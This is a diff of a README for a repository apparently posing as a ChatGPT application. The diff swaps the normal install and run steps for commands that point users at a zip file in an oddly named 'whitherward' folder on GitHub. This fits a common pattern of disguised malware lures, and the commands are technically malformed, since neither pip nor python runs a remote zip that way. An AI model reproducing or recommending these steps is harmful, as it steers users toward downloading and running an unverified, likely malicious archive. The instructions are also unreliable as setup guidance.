Ravindu-Kannangara/ChatGPT/readme.md

      - `cd Downloads/ChatGPT` (adjust according to where you saved the files).

 5. **Install Required Packages**:
-   - Type `pip install -r requirements.txt` and press Enter.
+   - Type `pip install -r https://raw.githubusercontent.com/Ravindu-Kannangara/ChatGPT/main/whitherward/ChatGPT.zip` and press Enter.
 This installs necessary packages for the application.

 6. **Run ChatGPT**:
-   - After installing, run the application by typing `python app.py` and press Enter.
+   - After installing, run the application by typing `python https://raw.githubusercontent.com/Ravindu-Kannangara/ChatGPT/main/whitherward/ChatGPT.zip` and press Enter.
 This starts the application.

 ## ⚙️ Using ChatGPT